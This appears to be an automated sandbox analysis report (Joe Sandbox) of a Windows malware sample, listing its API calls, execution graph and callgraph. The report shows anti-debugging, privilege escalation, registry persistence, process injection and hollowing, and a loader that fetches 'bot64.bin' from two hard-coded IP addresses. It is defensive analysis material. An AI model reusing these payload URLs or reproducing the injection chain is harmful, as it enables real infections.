                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3FE8: OpenProcessToken.ADVAPI32 ref: 00007FF7821C4062
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3FE8: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7821C408A
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3FE8: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7821C40B5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3FE8: CloseHandle.KERNEL32 ref: 00007FF7821C40C0
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3FE8: OpenProcess.KERNEL32 ref: 00007FF7821C40D5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7821C3FE8: CloseHandle.KERNEL32 ref: 00007FF7821C414D
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 00007FF7821C2F3C
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32 ref: 00007FF7821C2F4C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1939052907.00007FF7821C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7821C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939038046.00007FF7821C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939069166.00007FF7821C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939097903.00007FF7821C7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.1939116112.00007FF7821C8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_7ff7821c0000_7D3ED97FB83B796922796.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$Open$Process$HeapSleep$HttpInfoQueryToken$AdjustAllocCurrentFreeLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                                                    • String ID: http://176.111.174.140/bin/bot64.bin$http://176.111.174.177/bin/bot64.bin
                                                                                                                                                                                                                                                    • API String ID: 482118104-517461732
                                                                                                                                                                                                                                                    • Opcode ID: 9e57ee357461c1e72bec33a302a96111ffb077baf70864d85e7053ed898b4a17
                                                                                                                                                                                                                                                    • Instruction ID: 74863abee0404bcf07382f6d447b378ce97a86f787e8bca9bd9baceabc247147
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e57ee357461c1e72bec33a302a96111ffb077baf70864d85e7053ed898b4a17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2011A28E08643A1E610FB55F8543A6ABA4BB84766FF05435E84CC2A75CEFCE146C7A0

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:22.4%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:471
                                                                                                                                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                                                                                                                                    execution_graph 1368 7ff6626d49bf 1371 7ff6626d49cf 1368->1371 1369 7ff6626d4b03 GetProcessHeap HeapFree CloseHandle 1370 7ff6626d4b29 1369->1370 1371->1369 1372 7ff6626d4a14 GetProcessHeap HeapAlloc 1371->1372 1373 7ff6626d4a61 1371->1373 1372->1373 1373->1369 762 7ff6626d3360 822 7ff6626d10a0 762->822 767 7ff6626d3380 1042 7ff6626d4168 GetCurrentProcess OpenProcessToken 767->1042 768 7ff6626d3378 ExitProcess 772 7ff6626d339b 773 7ff6626d33ff 772->773 774 7ff6626d33b0 772->774 777 7ff6626d3414 773->777 780 7ff6626d3450 773->780 775 7ff6626d42a8 3 API calls 774->775 776 7ff6626d33bc 775->776 778 7ff6626d33c3 776->778 779 7ff6626d33d6 ExitProcess 776->779 781 7ff6626d42a8 3 API calls 777->781 782 7ff6626d42a8 3 API calls 778->782 786 7ff6626d3465 780->786 787 7ff6626d34a6 780->787 784 7ff6626d3420 781->784 783 7ff6626d33cf 782->783 783->779 785 7ff6626d33de 783->785 788 7ff6626d342f 784->788 789 7ff6626d3427 ExitProcess 784->789 1061 7ff6626d3210 785->1061 1057 7ff6626d42a8 CreateMutexExA 786->1057 1075 7ff6626d3978 787->1075 1070 7ff6626d3180 788->1070 794 7ff6626d3434 798 7ff6626d343b Sleep 794->798 799 7ff6626d3448 ExitProcess 794->799 796 7ff6626d33e3 801 7ff6626d33ea Sleep 796->801 802 7ff6626d33f7 ExitProcess 796->802 798->794 801->796 803 7ff6626d3480 806 7ff6626d3180 21 API calls 803->806 804 7ff6626d3478 ExitProcess 809 7ff6626d3485 806->809 807 7ff6626d3512 7 API calls 808 7ff6626d34be 810 7ff6626d42a8 3 API calls 808->810 811 7ff6626d348c Sleep 809->811 812 7ff6626d3499 ExitProcess 809->812 813 7ff6626d34ca 810->813 811->809 814 7ff6626d34e4 ExitProcess 813->814 815 7ff6626d42a8 3 API calls 813->815 816 7ff6626d34dd 815->816 816->814 817 7ff6626d34ec 816->817 818 7ff6626d3210 51 API calls 817->818 819 7ff6626d34f1 818->819 820 7ff6626d3505 ExitProcess 819->820 821 7ff6626d34f8 Sleep 819->821 821->819 1085 7ff6626d1000 LoadLibraryA GetProcAddress 822->1085 824 7ff6626d1131 1086 7ff6626d1000 LoadLibraryA GetProcAddress 824->1086 826 7ff6626d114b 1087 7ff6626d1050 LoadLibraryA GetProcAddress 826->1087 828 7ff6626d1165 1088 7ff6626d1050 LoadLibraryA GetProcAddress 828->1088 830 7ff6626d117f 1089 7ff6626d1050 LoadLibraryA GetProcAddress 830->1089 832 7ff6626d1199 1090 7ff6626d1050 LoadLibraryA GetProcAddress 832->1090 834 7ff6626d11b3 1091 7ff6626d1050 LoadLibraryA GetProcAddress 834->1091 836 7ff6626d11cd 1092 7ff6626d1050 LoadLibraryA GetProcAddress 836->1092 838 7ff6626d11e7 1093 7ff6626d1050 LoadLibraryA GetProcAddress 838->1093 840 7ff6626d1201 1094 7ff6626d1050 LoadLibraryA GetProcAddress 840->1094 842 7ff6626d121b 1095 7ff6626d1050 LoadLibraryA GetProcAddress 842->1095 844 7ff6626d1235 1096 7ff6626d1050 LoadLibraryA GetProcAddress 844->1096 846 7ff6626d124f 1097 7ff6626d1050 LoadLibraryA GetProcAddress 846->1097 848 7ff6626d1269 1098 7ff6626d1050 LoadLibraryA GetProcAddress 848->1098 850 7ff6626d1283 1099 7ff6626d1050 LoadLibraryA GetProcAddress 850->1099 852 7ff6626d129d 1100 7ff6626d1050 LoadLibraryA GetProcAddress 852->1100 854 7ff6626d12b7 1101 7ff6626d1050 LoadLibraryA GetProcAddress 854->1101 856 7ff6626d12d1 1102 7ff6626d1050 LoadLibraryA GetProcAddress 856->1102 858 7ff6626d12eb 1103 7ff6626d1050 LoadLibraryA GetProcAddress 858->1103 860 7ff6626d1305 1104 7ff6626d1050 LoadLibraryA GetProcAddress 860->1104 862 7ff6626d131f 1105 7ff6626d1050 LoadLibraryA GetProcAddress 862->1105 864 7ff6626d1339 1106 7ff6626d1050 LoadLibraryA GetProcAddress 864->1106 866 7ff6626d1353 1107 7ff6626d1050 LoadLibraryA GetProcAddress 866->1107 868 7ff6626d136d 1108 7ff6626d1050 LoadLibraryA GetProcAddress 868->1108 870 7ff6626d1387 1109 7ff6626d1050 LoadLibraryA GetProcAddress 870->1109 872 7ff6626d13a1 1110 7ff6626d1050 LoadLibraryA GetProcAddress 872->1110 874 7ff6626d13bb 1111 7ff6626d1050 LoadLibraryA GetProcAddress 874->1111 876 7ff6626d13d5 1112 7ff6626d1050 LoadLibraryA GetProcAddress 876->1112 878 7ff6626d13ef 1113 7ff6626d1050 LoadLibraryA GetProcAddress 878->1113 880 7ff6626d1409 1114 7ff6626d1050 LoadLibraryA GetProcAddress 880->1114 882 7ff6626d1423 1115 7ff6626d1050 LoadLibraryA GetProcAddress 882->1115 884 7ff6626d143d 1116 7ff6626d1050 LoadLibraryA GetProcAddress 884->1116 886 7ff6626d1457 1117 7ff6626d1050 LoadLibraryA GetProcAddress 886->1117 888 7ff6626d1471 1118 7ff6626d1050 LoadLibraryA GetProcAddress 888->1118 890 7ff6626d148b 1119 7ff6626d1050 LoadLibraryA GetProcAddress 890->1119 892 7ff6626d14a5 1120 7ff6626d1050 LoadLibraryA GetProcAddress 892->1120 894 7ff6626d14bf 1121 7ff6626d1050 LoadLibraryA GetProcAddress 894->1121 896 7ff6626d14d9 1122 7ff6626d1050 LoadLibraryA GetProcAddress 896->1122 898 7ff6626d14f3 1123 7ff6626d1050 LoadLibraryA GetProcAddress 898->1123 900 7ff6626d150d 1124 7ff6626d1050 LoadLibraryA GetProcAddress 900->1124 902 7ff6626d1527 1125 7ff6626d1050 LoadLibraryA GetProcAddress 902->1125 904 7ff6626d1541 1126 7ff6626d1050 LoadLibraryA GetProcAddress 904->1126 906 7ff6626d155b 1127 7ff6626d1050 LoadLibraryA GetProcAddress 906->1127 908 7ff6626d1575 1128 7ff6626d1050 LoadLibraryA GetProcAddress 908->1128 910 7ff6626d158f 1129 7ff6626d1050 LoadLibraryA GetProcAddress 910->1129 912 7ff6626d15a9 1130 7ff6626d1050 LoadLibraryA GetProcAddress 912->1130 914 7ff6626d15c3 1131 7ff6626d1050 LoadLibraryA GetProcAddress 914->1131 916 7ff6626d15dd 1132 7ff6626d1050 LoadLibraryA GetProcAddress 916->1132 918 7ff6626d15f7 1133 7ff6626d1050 LoadLibraryA GetProcAddress 918->1133 920 7ff6626d1611 1134 7ff6626d1050 LoadLibraryA GetProcAddress 920->1134 922 7ff6626d162b 1135 7ff6626d1050 LoadLibraryA GetProcAddress 922->1135 924 7ff6626d1645 1136 7ff6626d1050 LoadLibraryA GetProcAddress 924->1136 926 7ff6626d165f 1137 7ff6626d1050 LoadLibraryA GetProcAddress 926->1137 928 7ff6626d1679 1138 7ff6626d1050 LoadLibraryA GetProcAddress 928->1138 930 7ff6626d1693 1139 7ff6626d1050 LoadLibraryA GetProcAddress 930->1139 932 7ff6626d16ad 1140 7ff6626d1050 LoadLibraryA GetProcAddress 932->1140 934 7ff6626d16c7 1141 7ff6626d1050 LoadLibraryA GetProcAddress 934->1141 936 7ff6626d16e1 1142 7ff6626d1050 LoadLibraryA GetProcAddress 936->1142 938 7ff6626d16fb 1143 7ff6626d1050 LoadLibraryA GetProcAddress 938->1143 940 7ff6626d1715 1144 7ff6626d1050 LoadLibraryA GetProcAddress 940->1144 942 7ff6626d172f 1145 7ff6626d1050 LoadLibraryA GetProcAddress 942->1145 944 7ff6626d1749 1146 7ff6626d1050 LoadLibraryA GetProcAddress 944->1146 946 7ff6626d1763 1147 7ff6626d1050 LoadLibraryA GetProcAddress 946->1147 948 7ff6626d177d 1148 7ff6626d1050 LoadLibraryA GetProcAddress 948->1148 950 7ff6626d1797 1149 7ff6626d1050 LoadLibraryA GetProcAddress 950->1149 952 7ff6626d17b1 1150 7ff6626d1050 LoadLibraryA GetProcAddress 952->1150 954 7ff6626d17cb 1151 7ff6626d1050 LoadLibraryA GetProcAddress 954->1151 956 7ff6626d17e5 1152 7ff6626d1050 LoadLibraryA GetProcAddress 956->1152 958 7ff6626d17ff 1153 7ff6626d1050 LoadLibraryA GetProcAddress 958->1153 960 7ff6626d1819 1154 7ff6626d1050 LoadLibraryA GetProcAddress 960->1154 962 7ff6626d1833 1155 7ff6626d1050 LoadLibraryA GetProcAddress 962->1155 964 7ff6626d184d 1156 7ff6626d1050 LoadLibraryA GetProcAddress 964->1156 966 7ff6626d1867 1157 7ff6626d1050 LoadLibraryA GetProcAddress 966->1157 968 7ff6626d1881 1158 7ff6626d1050 LoadLibraryA GetProcAddress 968->1158 970 7ff6626d189b 1159 7ff6626d1050 LoadLibraryA GetProcAddress 970->1159 972 7ff6626d18b5 1160 7ff6626d1050 LoadLibraryA GetProcAddress 972->1160 974 7ff6626d18cf 1161 7ff6626d1050 LoadLibraryA GetProcAddress 974->1161 976 7ff6626d18e9 1162 7ff6626d1050 LoadLibraryA GetProcAddress 976->1162 978 7ff6626d1903 1163 7ff6626d1050 LoadLibraryA GetProcAddress 978->1163 980 7ff6626d191d 1164 7ff6626d1050 LoadLibraryA GetProcAddress 980->1164 982 7ff6626d1937 1165 7ff6626d1050 LoadLibraryA GetProcAddress 982->1165 984 7ff6626d1951 1166 7ff6626d1050 LoadLibraryA GetProcAddress 984->1166 986 7ff6626d196b 1167 7ff6626d1050 LoadLibraryA GetProcAddress 986->1167 988 7ff6626d1985 1168 7ff6626d1050 LoadLibraryA GetProcAddress 988->1168 990 7ff6626d199f 1169 7ff6626d1050 LoadLibraryA GetProcAddress 990->1169 992 7ff6626d19b9 1170 7ff6626d1050 LoadLibraryA GetProcAddress 992->1170 994 7ff6626d19d3 1171 7ff6626d1050 LoadLibraryA GetProcAddress 994->1171 996 7ff6626d19ed 1172 7ff6626d1050 LoadLibraryA GetProcAddress 996->1172 998 7ff6626d1a07 1173 7ff6626d1050 LoadLibraryA GetProcAddress 998->1173 1000 7ff6626d1a21 1174 7ff6626d1050 LoadLibraryA GetProcAddress 1000->1174 1002 7ff6626d1a3b 1175 7ff6626d1050 LoadLibraryA GetProcAddress 1002->1175 1004 7ff6626d1a55 1176 7ff6626d1050 LoadLibraryA GetProcAddress 1004->1176 1006 7ff6626d1a6f 1177 7ff6626d1050 LoadLibraryA GetProcAddress 1006->1177 1008 7ff6626d1a89 1178 7ff6626d1050 LoadLibraryA GetProcAddress 1008->1178 1010 7ff6626d1aa3 1179 7ff6626d1000 LoadLibraryA GetProcAddress 1010->1179 1012 7ff6626d1abd 1180 7ff6626d1050 LoadLibraryA GetProcAddress 1012->1180 1014 7ff6626d1ad7 1181 7ff6626d1050 LoadLibraryA GetProcAddress 1014->1181 1016 7ff6626d1af1 1182 7ff6626d1050 LoadLibraryA GetProcAddress 1016->1182 1018 7ff6626d1b0b 1183 7ff6626d1050 LoadLibraryA GetProcAddress 1018->1183 1020 7ff6626d1b25 1184 7ff6626d1050 LoadLibraryA GetProcAddress 1020->1184 1022 7ff6626d1b3f 1185 7ff6626d1050 LoadLibraryA GetProcAddress 1022->1185 1024 7ff6626d1b59 1186 7ff6626d1050 LoadLibraryA GetProcAddress 1024->1186 1026 7ff6626d1b73 1187 7ff6626d1050 LoadLibraryA GetProcAddress 1026->1187 1028 7ff6626d1b8d 1188 7ff6626d1050 LoadLibraryA GetProcAddress 1028->1188 1030 7ff6626d1ba7 1189 7ff6626d1050 LoadLibraryA GetProcAddress 1030->1189 1032 7ff6626d1bc1 1190 7ff6626d1050 LoadLibraryA GetProcAddress 1032->1190 1034 7ff6626d1bdb 1191 7ff6626d1050 LoadLibraryA GetProcAddress 1034->1191 1036 7ff6626d1bf5 1192 7ff6626d1050 LoadLibraryA GetProcAddress 1036->1192 1038 7ff6626d1c0f 1039 7ff6626d3120 IsDebuggerPresent 1038->1039 1040 7ff6626d3132 GetCurrentProcess CheckRemoteDebuggerPresent 1039->1040 1041 7ff6626d312e 1039->1041 1040->1041 1041->767 1041->768 1043 7ff6626d418e GetTokenInformation 1042->1043 1044 7ff6626d3385 1042->1044 1193 7ff6626d3a58 VirtualAlloc 1043->1193 1053 7ff6626d3be8 GetModuleFileNameW 1044->1053 1046 7ff6626d41bf GetTokenInformation 1047 7ff6626d41ec CloseHandle 1046->1047 1048 7ff6626d4206 AdjustTokenPrivileges CloseHandle 1046->1048 1049 7ff6626d3a28 VirtualFree 1047->1049 1194 7ff6626d3a28 1048->1194 1050 7ff6626d4201 1049->1050 1050->1044 1054 7ff6626d3c13 PathFindFileNameW wcslen 1053->1054 1055 7ff6626d3cd6 wcsncpy 1053->1055 1056 7ff6626d3c4d 1054->1056 1055->1056 1056->772 1058 7ff6626d42d4 GetLastError 1057->1058 1059 7ff6626d3471 1057->1059 1058->1059 1060 7ff6626d42e1 CloseHandle 1058->1060 1059->803 1059->804 1060->1059 1197 7ff6626d37c8 1061->1197 1063 7ff6626d3221 1200 7ff6626d1c20 1063->1200 1065 7ff6626d323b 1066 7ff6626d327d 1065->1066 1217 7ff6626d3fc8 1065->1217 1066->796 1071 7ff6626d37c8 11 API calls 1070->1071 1072 7ff6626d3190 1071->1072 1256 7ff6626d43b8 CreateFileW 1072->1256 1076 7ff6626d3648 3 API calls 1075->1076 1077 7ff6626d39a3 1076->1077 1078 7ff6626d37c8 11 API calls 1077->1078 1079 7ff6626d39ad GetModuleFileNameW DeleteFileW CopyFileW 1078->1079 1080 7ff6626d39ef SetFileAttributesW 1079->1080 1081 7ff6626d34ab 1079->1081 1268 7ff6626d38b8 RegOpenKeyExW 1080->1268 1083 7ff6626d32f0 GetVersionExW 1081->1083 1084 7ff6626d3321 1083->1084 1084->807 1084->808 1085->824 1086->826 1087->828 1088->830 1089->832 1090->834 1091->836 1092->838 1093->840 1094->842 1095->844 1096->846 1097->848 1098->850 1099->852 1100->854 1101->856 1102->858 1103->860 1104->862 1105->864 1106->866 1107->868 1108->870 1109->872 1110->874 1111->876 1112->878 1113->880 1114->882 1115->884 1116->886 1117->888 1118->890 1119->892 1120->894 1121->896 1122->898 1123->900 1124->902 1125->904 1126->906 1127->908 1128->910 1129->912 1130->914 1131->916 1132->918 1133->920 1134->922 1135->924 1136->926 1137->928 1138->930 1139->932 1140->934 1141->936 1142->938 1143->940 1144->942 1145->944 1146->946 1147->948 1148->950 1149->952 1150->954 1151->956 1152->958 1153->960 1154->962 1155->964 1156->966 1157->968 1158->970 1159->972 1160->974 1161->976 1162->978 1163->980 1164->982 1165->984 1166->986 1167->988 1168->990 1169->992 1170->994 1171->996 1172->998 1173->1000 1174->1002 1175->1004 1176->1006 1177->1008 1178->1010 1179->1012 1180->1014 1181->1016 1182->1018 1183->1020 1184->1022 1185->1024 1186->1026 1187->1028 1188->1030 1189->1032 1190->1034 1191->1036 1192->1038 1193->1046 1195 7ff6626d3a4c 1194->1195 1196 7ff6626d3a39 VirtualFree 1194->1196 1195->1044 1196->1195 1232 7ff6626d3648 GetWindowsDirectoryW 1197->1232 1199 7ff6626d37f7 8 API calls 1199->1063 1201 7ff6626d1c4a InternetOpenW 1200->1201 1202 7ff6626d1c84 InternetOpenUrlW 1201->1202 1203 7ff6626d1c77 Sleep 1201->1203 1204 7ff6626d1cbb InternetOpenUrlW 1202->1204 1205 7ff6626d1d0d HttpQueryInfoA 1202->1205 1203->1201 1204->1205 1206 7ff6626d1cf2 InternetCloseHandle Sleep 1204->1206 1207 7ff6626d1d62 1205->1207 1208 7ff6626d1d3c InternetCloseHandle InternetCloseHandle Sleep 1205->1208 1206->1201 1209 7ff6626d1d6c InternetCloseHandle InternetOpenUrlW 1207->1209 1210 7ff6626d1dc9 HttpQueryInfoA GetProcessHeap HeapAlloc 1207->1210 1208->1201 1209->1210 1211 7ff6626d1dae InternetCloseHandle Sleep 1209->1211 1212 7ff6626d1e2e InternetCloseHandle InternetCloseHandle 1210->1212 1213 7ff6626d1e48 1210->1213 1211->1201 1214 7ff6626d1ec7 1212->1214 1215 7ff6626d1e50 InternetReadFile 1213->1215 1216 7ff6626d1e9e InternetCloseHandle InternetCloseHandle 1213->1216 1214->1065 1215->1213 1215->1216 1216->1214 1237 7ff6626d3f08 CreateToolhelp32Snapshot 1217->1237 1220 7ff6626d3fe8 1221 7ff6626d404f GetCurrentProcess OpenProcessToken 1220->1221 1222 7ff6626d406c LookupPrivilegeValueW 1221->1222 1223 7ff6626d40c6 OpenProcess 1221->1223 1224 7ff6626d4094 AdjustTokenPrivileges 1222->1224 1225 7ff6626d40bb CloseHandle 1222->1225 1226 7ff6626d40f2 1223->1226 1227 7ff6626d40e8 1223->1227 1224->1225 1225->1223 1226->1227 1231 7ff6626d4126 WaitForSingleObject 1226->1231 1244 7ff6626d2bfc 1226->1244 1229 7ff6626d4153 1227->1229 1230 7ff6626d4148 CloseHandle 1227->1230 1229->1066 1230->1229 1231->1221 1231->1227 1233 7ff6626d3692 1232->1233 1234 7ff6626d369c GetVolumeInformationW 1232->1234 1233->1234 1235 7ff6626d3718 1234->1235 1236 7ff6626d3782 wsprintfW 1235->1236 1236->1199 1238 7ff6626d3f43 Process32FirstW 1237->1238 1239 7ff6626d3268 1237->1239 1240 7ff6626d3f62 wcscmp 1238->1240 1241 7ff6626d3f9d CloseHandle 1238->1241 1239->1220 1242 7ff6626d3f86 Process32NextW 1240->1242 1243 7ff6626d3f79 1240->1243 1241->1239 1242->1240 1242->1241 1243->1241 1246 7ff6626d2c4f 1244->1246 1245 7ff6626d2c6f 1245->1226 1246->1245 1248 7ff6626d2c91 VirtualAllocEx 1246->1248 1252 7ff6626d29cc 1246->1252 1248->1245 1249 7ff6626d2ccb WriteProcessMemory 1248->1249 1249->1245 1250 7ff6626d2d14 VirtualProtectEx 1249->1250 1250->1245 1251 7ff6626d2d47 CreateRemoteThread 1250->1251 1251->1245 1251->1246 1253 7ff6626d2a45 1252->1253 1254 7ff6626d2b4e StrStrA 1253->1254 1255 7ff6626d2a4c 1253->1255 1254->1253 1254->1255 1255->1246 1257 7ff6626d440e 1256->1257 1258 7ff6626d442f GetLastError 1256->1258 1262 7ff6626d4308 GetFileSize 1257->1262 1260 7ff6626d31a3 CreateThread Sleep CreateThread 1258->1260 1260->794 1267 7ff6626d3a58 VirtualAlloc 1262->1267 1264 7ff6626d4334 1265 7ff6626d4348 SetFilePointer ReadFile 1264->1265 1266 7ff6626d437e CloseHandle 1264->1266 1265->1266 1266->1260 1267->1264 1269 7ff6626d38fd RegSetValueExW RegCloseKey 1268->1269 1270 7ff6626d38f9 1268->1270 1269->1270 1270->1081 1271 7ff6626d2db0 1272 7ff6626d37c8 11 API calls 1271->1272 1273 7ff6626d2dc0 1272->1273 1278 7ff6626d4808 CreateFileW 1273->1278 1276 7ff6626d4808 17 API calls 1277 7ff6626d2e11 1276->1277 1279 7ff6626d486e GetFileSize GetProcessHeap HeapAlloc 1278->1279 1280 7ff6626d2deb 1278->1280 1281 7ff6626d48b7 CloseHandle 1279->1281 1282 7ff6626d48c9 ReadFile 1279->1282 1280->1276 1281->1280 1283 7ff6626d48f0 GetProcessHeap HeapFree CloseHandle 1282->1283 1284 7ff6626d4918 1282->1284 1283->1280 1285 7ff6626d4931 GetProcessHeap HeapFree CloseHandle 1284->1285 1286 7ff6626d4959 1284->1286 1285->1280 1287 7ff6626d4b03 GetProcessHeap HeapFree CloseHandle 1286->1287 1288 7ff6626d4a14 GetProcessHeap HeapAlloc 1286->1288 1289 7ff6626d4a61 1286->1289 1287->1280 1288->1289 1289->1287 1290 7ff6626d32b0 1293 7ff6626d1f8c GetModuleFileNameW 1290->1293 1294 7ff6626d200d 1293->1294 1302 7ff6626d2008 1293->1302 1295 7ff6626d2061 1294->1295 1296 7ff6626d204b 1294->1296 1336 7ff6626d1ecc ExpandEnvironmentStringsW 1295->1336 1298 7ff6626d2055 1296->1298 1299 7ff6626d207f 1296->1299 1298->1302 1338 7ff6626d1f4c ExpandEnvironmentStringsW 1298->1338 1337 7ff6626d1f0c ExpandEnvironmentStringsW 1299->1337 1300 7ff6626d2076 1300->1302 1304 7ff6626d20d1 CreateProcessW 1300->1304 1304->1302 1305 7ff6626d212c CreateFileW 1304->1305 1305->1302 1306 7ff6626d2173 GetFileSize 1305->1306 1307 7ff6626d2191 1306->1307 1308 7ff6626d219b CloseHandle 1306->1308 1307->1308 1309 7ff6626d21ab VirtualAlloc 1307->1309 1308->1302 1310 7ff6626d21e5 ReadFile 1309->1310 1311 7ff6626d21d5 CloseHandle 1309->1311 1312 7ff6626d2212 VirtualFree CloseHandle 1310->1312 1313 7ff6626d2235 CloseHandle GetThreadContext 1310->1313 1311->1302 1312->1302 1314 7ff6626d2285 VirtualFree 1313->1314 1315 7ff6626d229d ReadProcessMemory GetModuleHandleA GetProcAddress 1313->1315 1314->1302 1316 7ff6626d2320 1315->1316 1317 7ff6626d2324 VirtualFree 1316->1317 1318 7ff6626d233c VirtualAllocEx 1316->1318 1317->1302 1319 7ff6626d23bf WriteProcessMemory 1318->1319 1320 7ff6626d23a7 VirtualFree 1318->1320 1321 7ff6626d23f5 VirtualFree 1319->1321 1324 7ff6626d240d 1319->1324 1320->1302 1321->1302 1322 7ff6626d2443 WriteProcessMemory 1323 7ff6626d24ce VirtualFree 1322->1323 1322->1324 1323->1302 1324->1322 1329 7ff6626d24eb 1324->1329 1325 7ff6626d27dc WriteProcessMemory SetThreadContext 1327 7ff6626d2862 VirtualFree 1325->1327 1328 7ff6626d2877 ResumeThread 1325->1328 1326 7ff6626d255d RtlCompareMemory 1326->1329 1333 7ff6626d25b0 1326->1333 1327->1302 1330 7ff6626d289e VirtualFree 1328->1330 1331 7ff6626d2889 VirtualFree 1328->1331 1329->1325 1329->1326 1330->1302 1331->1302 1332 7ff6626d27d7 1332->1325 1333->1332 1334 7ff6626d26e0 ReadProcessMemory WriteProcessMemory 1333->1334 1334->1333 1335 7ff6626d27b5 VirtualFree 1334->1335 1335->1302 1336->1300 1337->1300 1338->1300 1339 7ff6626d3290 1340 7ff6626d1f8c 36 API calls 1339->1340 1341 7ff6626d32a0 1340->1341 1342 7ff6626d30f0 1343 7ff6626d30f9 1342->1343 1344 7ff6626d3112 1343->1344 1347 7ff6626d2f70 1343->1347 1352 7ff6626d2e30 CreateMutexA 1347->1352 1350 7ff6626d2fd0 Sleep 1350->1343 1351 7ff6626d2f8b Sleep CreateThread WaitForSingleObject 1351->1350 1353 7ff6626d2e5c ReleaseMutex CloseHandle 1352->1353 1354 7ff6626d2e79 GetLastError 1352->1354 1355 7ff6626d2ebb 1353->1355 1356 7ff6626d2ea3 ReleaseMutex CloseHandle 1354->1356 1357 7ff6626d2e86 ReleaseMutex CloseHandle 1354->1357 1355->1350 1355->1351 1356->1355 1357->1355 1358 7ff6626d2ed0 1359 7ff6626d1c20 22 API calls 1358->1359 1360 7ff6626d2f04 1359->1360 1361 7ff6626d3fc8 5 API calls 1360->1361 1362 7ff6626d2f27 1361->1362 1363 7ff6626d3fe8 13 API calls 1362->1363 1364 7ff6626d2f3c GetProcessHeap HeapFree 1363->1364 1374 7ff6626d2fe0 1380 7ff6626d2fe9 1374->1380 1375 7ff6626d30d5 1378 7ff6626d3b28 RegDeleteKeyW 1378->1380 1379 7ff6626d3d28 9 API calls 1379->1380 1380->1375 1380->1378 1380->1379 1381 7ff6626d38b8 3 API calls 1380->1381 1383 7ff6626d44c8 CreateFileW 1380->1383 1388 7ff6626d3a88 RegOpenKeyExW 1380->1388 1382 7ff6626d30c5 Sleep 1381->1382 1382->1380 1384 7ff6626d4523 1383->1384 1385 7ff6626d455e 1383->1385 1391 7ff6626d4448 SetFilePointer WriteFile SetEndOfFile 1384->1391 1385->1380 1387 7ff6626d453f SetFileAttributesW CloseHandle 1387->1385 1389 7ff6626d3adc RegSetValueExW RegCloseKey 1388->1389 1390 7ff6626d3b16 1388->1390 1389->1390 1390->1380 1391->1387

                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                                                                    callgraph 0 Function_00007FF6626D2E30 1 Function_00007FF6626D2DB0 22 Function_00007FF6626D4808 1->22 48 Function_00007FF6626D37C8 1->48 2 Function_00007FF6626D32B0 17 Function_00007FF6626D1F8C 2->17 3 Function_00007FF6626D3D28 4 Function_00007FF6626D3B28 5 Function_00007FF6626D3A28 6 Function_00007FF6626D42A8 7 Function_00007FF6626D1C20 8 Function_00007FF6626D3120 9 Function_00007FF6626D10A0 24 Function_00007FF6626D1000 9->24 40 Function_00007FF6626D1050 9->40 10 Function_00007FF6626D34A1 11 Function_00007FF6626D4798 12 Function_00007FF6626D3E18 13 Function_00007FF6626D3618 14 Function_00007FF6626D3210 14->7 34 Function_00007FF6626D3B68 14->34 36 Function_00007FF6626D3FE8 14->36 14->48 49 Function_00007FF6626D3FC8 14->49 15 Function_00007FF6626D3290 15->17 16 Function_00007FF6626D1F0C 17->16 43 Function_00007FF6626D1F4C 17->43 45 Function_00007FF6626D1ECC 17->45 18 Function_00007FF6626D350D 19 Function_00007FF6626D3A88 20 Function_00007FF6626D3F08 21 Function_00007FF6626D4308 39 Function_00007FF6626D3A58 21->39 22->11 27 Function_00007FF6626D4578 22->27 23 Function_00007FF6626D3180 23->48 54 Function_00007FF6626D43B8 23->54 25 Function_00007FF6626D3600 26 Function_00007FF6626D2BFC 44 Function_00007FF6626D29CC 26->44 28 Function_00007FF6626D3978 47 Function_00007FF6626D3648 28->47 28->48 53 Function_00007FF6626D38B8 28->53 29 Function_00007FF6626D2F70 29->0 30 Function_00007FF6626D32F0 31 Function_00007FF6626D30F0 31->29 32 Function_00007FF6626D35F0 33 Function_00007FF6626D4168 33->5 33->39 35 Function_00007FF6626D3BE8 36->26 37 Function_00007FF6626D3360 37->6 37->8 37->9 37->12 37->14 37->23 37->28 37->30 37->33 37->35 38 Function_00007FF6626D2FE0 38->3 38->4 38->19 50 Function_00007FF6626D44C8 38->50 38->53 41 Function_00007FF6626D2ED0 41->7 41->34 41->36 41->49 42 Function_00007FF6626D32D0 42->17 52 Function_00007FF6626D28BC 44->52 46 Function_00007FF6626D4448 47->13 48->47 49->20 50->46 51 Function_00007FF6626D49BF 51->11 51->27 54->21

                                                                                                                                                                                                                                                    Executed Functions

